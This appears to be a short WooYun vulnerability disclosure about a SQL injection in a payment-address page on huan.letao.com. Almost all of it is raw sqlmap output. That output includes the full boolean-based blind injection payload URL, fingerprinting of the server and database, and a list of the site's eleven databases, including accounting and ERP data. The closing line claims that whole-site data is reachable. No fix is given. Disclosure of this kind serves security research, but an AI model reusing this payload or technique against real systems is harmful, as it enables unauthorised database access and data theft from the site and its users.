WooYun.org

sqlmap可以直接跑数据
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q]
[16:22:46] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://huan.letao.com:80/wap/pay/address.aspx?tid=0&form=0&addressid=&aid=130706&cid=130700' and 1=(case when 1=1 AND 8991=8991 then 1 else 2/0 end) and '1'='1&pid=130000&uuid1453881206&add=&c=&op=newadd
---
[16:22:48] [INFO] testing Microsoft SQL Server
[16:22:48] [INFO] confirming Microsoft SQL Server
[16:22:48] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[16:22:48] [INFO] fetching database names
[16:22:48] [INFO] fetching number of databases
[16:22:48] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[16:22:48] [INFO] retrieved:
sqlmap got a 302 redirect to 'http://huan.letao.com:80/404error.htm'. Do you want to follow? [Y/n] n
[16:22:50] [WARNING] reflective value(s) found and filtering out
11
[16:22:51] [INFO] retrieved: ASPState
[16:23:00] [INFO] retrieved: distribution
[16:23:12] [INFO] retrieved: ImagesRecord
[16:23:24] [INFO] retrieved: letao_accounting
[16:23:40] [INFO] retrieved: Letao_Web_Log
[16:23:53] [INFO] retrieved: letaoerp
[16:24:02] [INFO] retrieved: master
[16:24:08] [INFO] retrieved: model
[16:24:14] [INFO] retrieved: msdb
[16:24:19] [INFO] retrieved: tempdb
[16:24:25] [INFO] retrieved: test2_letaoerp
available databases [11]:
[*] ASPState
[*] distribution
[*] ImagesRecord
[*] letao_accounting
[*] Letao_Web_Log
[*] letaoerp
[*] master
[*] model
[*] msdb
[*] tempdb
[*] test2_letaoerp
从历史漏洞来看，应该是整站数据都在了